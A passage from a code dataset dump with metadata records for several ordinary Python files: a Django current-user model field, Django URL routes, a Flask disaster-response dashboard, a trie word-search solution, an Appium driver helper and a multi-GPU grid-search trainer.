"line_number": 138, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks.update_stats", "line_number": 145, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 145, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks.update_stats", "line_number": 151, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 151, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 157, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskType", "line_number": 158, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 158, "usage_type": "name"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 160, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 160, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 167, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 170, "usage_type": "argument"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 174, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 174, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 182, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 184, "usage_type": "argument"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 189, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 189, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 196, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 199, "usage_type": "argument"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 203, "usage_type": "call"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 205, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 205, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 214, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 217, "usage_type": "argument"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 223, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 223, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 228, "usage_type": "name"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 232, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 232, "usage_type": "name"}]} +{"seq_id": "26858688632", "text": "import warnings\n\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django_currentuser.middleware import get_current_authenticated_user\n\n\nclass CurrentUserField(models.ForeignKey):\n\n warning = (\"You passed an argument to CurrentUserField that will be \"\n \"ignored. Avoid args and following kwargs: default, null, to.\")\n description = _(\n 'as default value sets the current logged in user if available')\n defaults = dict(null=True, default=get_current_authenticated_user,\n to=settings.AUTH_USER_MODEL)\n\n def __init__(self, *args, **kwargs):\n self.on_update = kwargs.pop(\"on_update\", False)\n\n # If `to` is present in kwargs, and the same when ignoring case then\n # update `to` to use the defaults.\n # Fix for https://github.com/zsoldosp/django-currentuser/issues/43\n if \"to\" in kwargs \\\n and kwargs[\"to\"].lower() == self.defaults['to'].lower():\n kwargs[\"to\"] = self.defaults['to']\n\n self._warn_for_shadowing_args(*args, **kwargs)\n\n if \"on_delete\" not in kwargs:\n kwargs[\"on_delete\"] = models.CASCADE\n\n if self.on_update:\n kwargs[\"editable\"] = False\n kwargs[\"blank\"] = True\n\n kwargs.update(self.defaults)\n super(CurrentUserField, self).__init__(**kwargs)\n\n def deconstruct(self):\n name, path, args, kwargs = super(CurrentUserField, self).deconstruct()\n if self.on_update:\n kwargs['on_update'] = self.on_update\n del kwargs[\"editable\"]\n del kwargs[\"blank\"]\n\n return name, path, args, kwargs\n\n def pre_save(self, model_instance, add):\n if self.on_update:\n value = get_current_authenticated_user()\n if value is not None:\n value = value.pk\n setattr(model_instance, self.attname, value)\n return value\n else:\n return super(CurrentUserField, self).pre_save(model_instance, add)\n\n def _warn_for_shadowing_args(self, *args, **kwargs):\n if args:\n warnings.warn(self.warning)\n else:\n for key in set(kwargs).intersection(set(self.defaults.keys())):\n if not kwargs[key] == self.defaults[key]:\n warnings.warn(self.warning)\n break\n", "repo_name": "zsoldosp/django-currentuser", "sub_path": "django_currentuser/db/models/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 134, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.ForeignKey", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 13, "usage_type": "call"}, {"api_name": "django_currentuser.middleware.get_current_authenticated_user", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django_currentuser.middleware.get_current_authenticated_user", "line_number": 51, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 61, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "27969879086", "text": "import uuid\nfrom django.urls import path\nfrom . import views\n\napp_name = 'mealshop'\n\nurlpatterns = [\n path('', views.index, name='index'),\n # Employees menu request\n path('menu/', views.menu, name='menu'),\n path('/choose_menu/', views.choose_menu, name='choose_menu'),\n path('/add_order', views.add_order, name='add_order'),\n path('view_orders/', views.view_orders, name='view_orders'),\n path('/add_order_customizations',\n views.add_order_customizations, name='add_order_customizations'),\n # Menu paths\n path('create_menu/',\n views.create_menu, name='create_menu'),\n path('add_menu/',\n views.add_menu, name='add_menu'),\n path('/update_daily_menu',\n views.update_daily_menu, name='update_daily_menu'),\n path('daily_menu/', views.daily_menu, name='daily_menu'),\n path('/create_reminder', views.create_reminder,\n name='create_reminder'),\n # Menu Option paths\n path('/menu_option/',\n views.menu_option, name='menu_option'),\n path('/add_customization/',\n views.add_customization, name='add_customization'),\n path('menu_options/',\n views.menu_options, name='menu_options'),\n path('add_menu_option/',\n views.add_menu_option, name='add_menu_option')\n]\n", "repo_name": "omabena/learn-django", "sub_path": "mealshop/app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "15961624998", "text": "import json\nimport plotly\nimport pandas as pd\nfrom plotly.graph_objects import Bar, layout, Layout\nfrom plotly.subplots import make_subplots\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\ninit_notebook_mode(connected=True)\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nimport joblib\nfrom sqlalchemy import create_engine\n\n\napp = Flask(__name__)\n\ndef tokenize(text):\n \"\"\"\n Tokenizing the input text (together with lemmatizer, lowering the letters and stripping the text from unneeded spaces)\n \n INPUT:\n text - a string for tokenization\n \n OUTPUT:\n clean_tokens - a list of tokenized words\n \"\"\"\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n# load data\nengine = create_engine('sqlite:///../data/DisasterResponse.db')\ndf = pd.read_sql_table('messages', engine)\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n # data for the distribution graph\n genre_counts = df.groupby('genre').count()['message']\n genre_names = list(genre_counts.index)\n \n # data for the subplots graph\n genre_unique = df['genre'].unique()\n plotting_df = pd.melt(df, id_vars=['genre'], value_vars=df.columns[3:])\n plotting_df = plotting_df.groupby(['genre', 'variable']).sum().reset_index()\n \n # graph number 2\n fig1 = make_subplots(rows=genre_unique.shape[0], cols=1, print_grid=False, subplot_titles=genre_unique)\n \n i=1\n for genre in genre_unique:\n data=plotting_df[plotting_df['genre']==genre]\n fig1.add_trace(Bar(x=data['variable'], y=data['value'], opacity=0.5, marker=dict(color='#F1C40F')), row=i, col=1)\n i+=1\n \n # cleaning the layout of the graphs\n layout_custom = layout.Template(\n layout=Layout(titlefont=dict(size=24, color='#34495E'))\n )\n \n fig1['layout'].update(title='Messages by genre and category', \n showlegend=False,\n template=layout_custom)\n \n fig1['layout']['yaxis1'].update(hoverformat=',d', tickformat=',d')\n fig1['layout']['yaxis2'].update(hoverformat=',d', tickformat=',d')\n fig1['layout']['yaxis3'].update(hoverformat=',d', tickformat=',d')\n fig1['layout']['xaxis1'].update(visible=False)\n fig1['layout']['xaxis2'].update(visible=False)\n \n # graph number 1\n graphs = [\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts,\n opacity=0.5, \n marker=dict(color='#F1C40F')\n )\n ],\n\n 'layout': {\n 'template': layout_custom,\n 'title': 'Distribution of Message Genres',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n }]\n \n graphs.append(fig1)\n \n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n \n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n # save user input in query\n query = request.args.get('query', '') \n\n # use model to predict classification for query\n classification_labels = model.predict([query])[0]\n classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the go.html Please see that file. \n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\n\nif __name__ == '__main__':\n main()", "repo_name": "MortaV/Udacity_Disaster_Response", "sub_path": "app/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 4254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "plotly.offline.init_notebook_mode", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.read_sql_table", "line_number": 42, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.subplots.make_subplots", "line_number": 61, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout.Template", "line_number": 70, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 70, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Layout", "line_number": 71, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 88, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 112, "usage_type": "call"}, {"api_name": "plotly.utils", "line_number": 112, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 115, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "1640102722", "text": "from typing import List\n\n\nclass Trie:\n\n def __init__(self):\n self.children = {}\n self.word = ''\n\n def add_word(self, word):\n cur = self\n for char in word:\n if char not in cur.children:\n cur.children[char] = Trie()\n cur = cur.children[char]\n cur.word = word\n\n\nclass Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n root = Trie()\n for word in words:\n root.add_word(word)\n\n ROWS, COLS = len(board), len(board[0])\n res, visit = set(), set()\n directions = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n def dfs(r, c, trie_node):\n if r not in range(ROWS) or c not in range(COLS) or (r, c) in visit or board[r][c] not in trie_node.children:\n return\n\n visit.add((r, c))\n char = board[r][c]\n node = trie_node.children[char]\n if node.word:\n res.add(node.word)\n\n for dx, dy in directions:\n dfs(r + dx, c + dy, node)\n\n visit.remove((r, c))\n\n for r in range(ROWS):\n for c in range(COLS):\n dfs(r, c, root)\n\n return list(res)\n\n\nif __name__ == '__main__':\n board = [[\"a\",\"b\"],[\"c\",\"d\"]]\n words = [\"abcb\"]\n print(Solution().findWords(board, words))", "repo_name": "amogchandrashekar/Leetcode", "sub_path": "Hard/Word Search II.py", "file_name": "Word Search II.py", "file_ext": "py", "file_size_in_byte": 1365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "9444736788", "text": "#coding=utf-8\n#author='Shichao-Dong'\n\nimport time, os\nfrom appium import webdriver\nfrom comm.Log import Logger\nfrom selenium.common.exceptions import WebDriverException\nfrom comm.StartAppiumServer import Sp\nfrom comm.readConfig import ReadConfig\n\nconf = ReadConfig()\nlog = Logger()\n\napp_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), \"../..\")), 'UI-Test', 'comm', 'apps', 'cibn.apk')\nplatformName = conf.get_config('platformName')\nappPackage = conf.get_config('appPackage')\nappActivity = conf.get_config('appActivity')\nappium_port = conf.get_config('appium_port')\n\nclass webDriver:\n def __init__(self):\n self.get_device = conf.get_cmd('viewDevices')\n self.get_Version = conf.get_cmd('platformVersion')\n self.startServer = conf.get_cmd('startServer')\n\n def get_deviceName(self):\n values = os.popen(self.get_device).readlines()\n print(values)\n dev = values[1].split()[0]\n if len(values)-2 == 1:\n print(dev)\n log.info('可用设备为:'+ dev)\n return dev\n else:\n log.warn('暂未获取到可用设备')\n print('No device found')\n\n def get_platformVersion(self):\n values = os.popen(self.get_Version).readlines()\n # log.info('系统版本号为:'+ str(values))\n if values != '':\n Version=values[0].split('=')[1]\n print(Version)\n log.info('可用设备版本号为:'+Version)\n return Version.strip()\n else:\n log.warn('暂未获取到可用设备')\n print('No device found')\n\n def get_driver(cls):\n desired_caps = {\n 'platformName': platformName,\n 'deviceName': webDriver().get_deviceName(),\n # 'platformVersion': webDriver().get_platformVersion(),\n 'platformVersion': '9',\n 'appPackage': appPackage,\n 'appActivity': appActivity,\n 'automationName': 'uiautomator2',\n 'unicodeKeyboard': True,\n 'resetKeyboard': True,\n 'noReset': True,\n 'newCommandTimeout': 6000,\n 'app': app_path\n }\n try:\n # Sp().stop_appium()\n # Sp().start_appium() #自动化全跑的话再运行\n driver = webdriver.Remote('http://127.0.0.1:%s/wd/hub'%appium_port, desired_caps)\n time.sleep(4)\n print(\"driver加载成功\")\n return driver\n except WebDriverException:\n print(\"driver加载失败\")\n\n # @classmethod\n # def setUpClass(cls):\n # global driver, countA\n # # appium启动服务只运行一次\n # if countA == 1:\n # # 启动appium服务\n # Sp().start_appium() # 自动化全跑的话再运行\n # countA = countA + 1\n # cls.get_driver()\n\n # @classmethod\n # def tearDownClass(cls):\n # # 关闭浏览器驱动\n # cls.driver.quit()\n # # 卸载app\n # cls.driver.removeApp(appPackage);\n # # 关闭appium服务\n # Sp().stop_appium()\n\n# if __name__ == \"__main__\":\n# webDriver().get_driver()\n# cur_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), \"..\"))) + \"\\\\testSmoke\"\n# print(cur_path)\n", "repo_name": "dongyn/UI-Test", "sub_path": "comm/webDriver.py", "file_name": "webDriver.py", "file_ext": "py", "file_size_in_byte": 3260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "comm.readConfig.ReadConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "comm.Log.Logger", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 27, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 39, "usage_type": "call"}, {"api_name": "appium.webdriver.Remote", "line_number": 68, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.WebDriverException", "line_number": 72, "usage_type": "name"}]} +{"seq_id": "11427199662", "text": "import argparse\nimport logging\nimport os\nfrom glob import glob\nimport importlib\nimport sys\nimport csv\nimport traceback\nimport time\nfrom multiprocessing import Process, Queue\nfrom common.util import mkdir_if_not_exists, print_info, get_human_readable_time, LossException\nimport json\n\n#DEFAULT_DATASET = \"/media/bighdd5/simon/projects/data/datasets/hourglass_samples_with_afw_without_multipie.h5\"\n\n# TODO improve logging, use Lock to ensure only one process prints to stdout?\n# https://stackoverflow.com/questions/13733552/logger-configuration-to-log-to-file-and-print-to-stdout\n# https://docs.python.org/3/howto/logging-cookbook.html\n\nALL_WORK_DONE_TOKEN = \"__NOTHING_LEFT_TO_DO__\" # Used to mark queue end\n\n\nclass Worker(object):\n def __init__(self, gpu_id, sub_gpu_id, config_queue, model_dir, output_dir, data, result_queue):\n self.gpu_id = int(gpu_id)\n self.sub_gpu_id = int(sub_gpu_id)\n self.config_queue = config_queue\n self.trainer_module = importlib.import_module(\"%s.main\" % model_dir)\n self.output_dir = output_dir\n self.result_queue = result_queue\n self.data = data\n\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n print_info(\"Created folder '%s'\" % self.output_dir)\n\n def work(self):\n while True:\n configfile = self.config_queue.get()\n if configfile == ALL_WORK_DONE_TOKEN:\n msg = \"GPU %d.%d found an empty queue => Terminate\" % (self.gpu_id, self.sub_gpu_id)\n print_info(msg)\n logging.info(msg)\n return\n\n print_info(\"[qsize=%d] GPU %d.%d -> %s\" % (self.config_queue.qsize(), self.gpu_id, self.sub_gpu_id, configfile))\n\n time.sleep((self.gpu_id + self.sub_gpu_id + 100) / 1000)\n\n try:\n model_trainer = self.trainer_module.ModelTrainer(config=configfile,\n output_dir=self.output_dir,\n gpu_id=self.gpu_id,\n sub_gpu_id=self.sub_gpu_id,\n data=self.data,\n gridsearch=True)\n results = model_trainer.run()\n self.result_queue.put(results)\n msg = \"GPU %d.%d finished %s\" % (self.gpu_id, self.sub_gpu_id, configfile)\n print_info(msg)\n logging.info(msg)\n\n except Exception as e:\n msg = \"Config '%s' failed on GPU %d.%d: \\n>>> %s\" % (configfile, self.gpu_id, self.sub_gpu_id, str(e))\n print_info(msg)\n logging.error(msg)\n if not isinstance(e, LossException):\n traceback.print_exc()\n\n try:\n fn = os.path.join(self.output_dir, \"failed.txt\")\n with open(fn, \"a\") as f:\n f.write(\"[%s] %s : %s\\n\\n\" % (get_human_readable_time(), configfile, msg))\n except Exception as e2:\n msg = \"Failure could not be written to failed.txt: %s\" % str(e)\n print_info(msg)\n logging.error(msg)\n\n time.sleep(1) # Wait in case GPU needs time to release memory\n\n @staticmethod\n def run_worker(gpu_id, sub_gpu_id, config_queue, model_dir, output_dir, data, result_queue):\n \"\"\"\n This static helper method is to ensure that is no reference to each worker in the parent process.\n This is just to avoid any side effects of using PyTorch and other libs in parallel (these side effects\n occured when using Threads instead of Processes and caused DataLoader to freeze randomly)\n \"\"\"\n worker = Worker(gpu_id, sub_gpu_id, config_queue, model_dir, output_dir, data, result_queue)\n worker.work()\n\n\nclass ResultHandler(object):\n def __init__(self, queue, result_file, done_list_file):\n self.queue = queue\n self.result_file = result_file\n self.done_list_file = done_list_file\n\n def work(self):\n with open(self.result_file, 'a', newline='') as csvfile, \\\n open(self.done_list_file, 'a') as done_list:\n writer = None\n\n while True:\n result = self.queue.get()\n if result == ALL_WORK_DONE_TOKEN:\n msg = \"Result writer process found an empty queue => Terminate\"\n print_info(msg)\n logging.info(msg)\n return\n\n if not writer:\n # This is a little workaround to the problem that it must be known in advance which fields\n # will be written to the file. The first result in the queue defines the set of fieldnames\n # that will be written to the header. It is assumed that every result contains the same set\n # of keys. If new keys are added to new results, an exception will be thrown.\n ks = [k for k in result.keys() if k != \"metrics_log\"]\n writer = csv.DictWriter(csvfile, fieldnames=ks)\n writer.writeheader()\n\n if \"metrics_log\" in result:\n metrics_log = result[\"metrics_log\"]\n result = {k:v for k,v in result.items() if k != \"metrics_log\"}\n config_id = result[\"config_id\"]\n\n directory, _ = os.path.split(self.result_file)\n target = os.path.join(directory, \"results\", \"%d_metrics.log\" % config_id)\n json.dump(metrics_log, open(target, \"w\"))\n\n writer.writerow(result)\n csvfile.flush() # needed to ensure that nothing is lost in case of crashes\n\n # Write the path to the config file that has just been finished to a file that can be used the next\n # time to skip already completed configs.\n done_list.write(\"%s\\n\" % result[\"config_file\"]) # TODO only write config id\n done_list.flush()\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Perform grid search on a model in MODEL_DIR using hyperparameter\"\n \"configurations from CONFIG_DIR and write results to OUTPUT_DIR\")\n parser.add_argument('model_dir',\n type=str,\n help='directory of model that contains a main.py')\n\n parser.add_argument('config_dir',\n type=str,\n help='directory of commands')\n\n parser.add_argument('output_dir',\n type=str,\n help='where to store plots, trained models, results, etc')\n\n parser.add_argument('dataset',\n type=str,\n help=\"Source data to train model\")\n\n parser.add_argument('--no_skip',\n action=\"store_true\",\n help=\"Ignore items in done_configs.txt and train them again (if this flag is not set, configs \"\n \"listed in done_configs.txt will be skipped. Useful when training should be resumed). \"\n \"Existing models, plots, results/*.txt will be overridden\")\n\n parser.add_argument('--gpus',\n type=int,\n default=[0, 1, 2, 3],\n nargs=\"+\",\n help='IDs of GPUs to use, separated by spaces')\n\n parser.add_argument('--workers_per_gpu',\n type=int,\n default=1,\n help=\"For small models, run multiple models on one GPU\")\n\n opt = parser.parse_args()\n\n output_dir = os.path.abspath(opt.output_dir)\n mkdir_if_not_exists(output_dir)\n logfile = os.path.join(output_dir, \"trainer.log\")\n\n logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] <%(levelname)s> %(message)s',\n filename=logfile, filemode='a')\n logging.info(\"-------- trainer.py started ------------\")\n\n print(\"Training '%s' with confs '%s' on GPUs %s\" % (opt.model_dir, opt.config_dir, \",\".join(map(str, opt.gpus))))\n\n # Needed to enable models to import relatively to their own folder (they do not have to know about trainer.py)\n sys.path.append(os.path.join(os.path.dirname(__file__), opt.model_dir))\n\n skip_list_file = os.path.join(output_dir, \"done_configs.txt\")\n skip_configfiles = []\n if not opt.no_skip and os.path.exists(skip_list_file) and os.path.isfile(skip_list_file):\n with open(skip_list_file, 'r') as f:\n skip_configfiles = f.read().splitlines()\n\n config_queue = Queue()\n for configfile in glob(os.path.join(opt.config_dir, \"*.json\")): # TODO only check for ID and not full path\n if configfile in skip_configfiles:\n print(\"Skip %s\" % configfile)\n else:\n config_queue.put(configfile)\n\n results_csv = os.path.join(opt.output_dir, \"results_0.csv\")\n c = 1\n while os.path.exists(results_csv) and os.path.isfile(results_csv):\n print(\"%s exists\" % results_csv)\n results_csv = os.path.join(opt.output_dir, \"results_%d.csv\" % c)\n c += 1\n print(\"results file: %s\" % results_csv)\n\n result_queue = Queue()\n result_handler = ResultHandler(result_queue, results_csv, skip_list_file)\n result_process = Process(name=\"result_handler\", target=result_handler.work)\n result_process.daemon = True\n result_process.start()\n\n processes = []\n for gpu_id in opt.gpus:\n for sub_gpu_id in range(opt.workers_per_gpu):\n config_queue.put(ALL_WORK_DONE_TOKEN) # To signal the workers that they can stop, put this num_worker times at the end of the queue (so each process will read it exactly one time at the end)\n p = Process(name=\"gpu_%d.%d_worker\" % (gpu_id, sub_gpu_id), target=Worker.run_worker, args=(gpu_id, sub_gpu_id, config_queue, opt.model_dir, output_dir, opt.dataset, result_queue))\n p.start()\n processes.append(p)\n print_info(\"Worker for GPU %d.%d started\" % (gpu_id, sub_gpu_id))\n\n for p in processes:\n p.join()\n print(\"All jobs are done\")\n\n result_queue.put(ALL_WORK_DONE_TOKEN) # To signal the process that it can stop\n result_process.join()\n print(\"All results written\")\n\n logging.shutdown()\n\n\nif __name__ == '__main__':\n main()", "repo_name": "simonhessner/masters-thesis-final", "sub_path": "code/trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 10675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "importlib.import_module", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 34, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 35, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 61, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 66, "usage_type": "call"}, {"api_name": "common.util.LossException", "line_number": 67, "usage_type": "argument"}, {"api_name": "traceback.print_exc", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "common.util.get_human_readable_time", "line_number": 73, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 108, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 127, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "common.util.mkdir_if_not_exists", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 181, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 181, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 183, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 188, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 192, "usage_type": "call"}, {"api_name": "os.path", "line_number": 192, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 192, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 196, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", 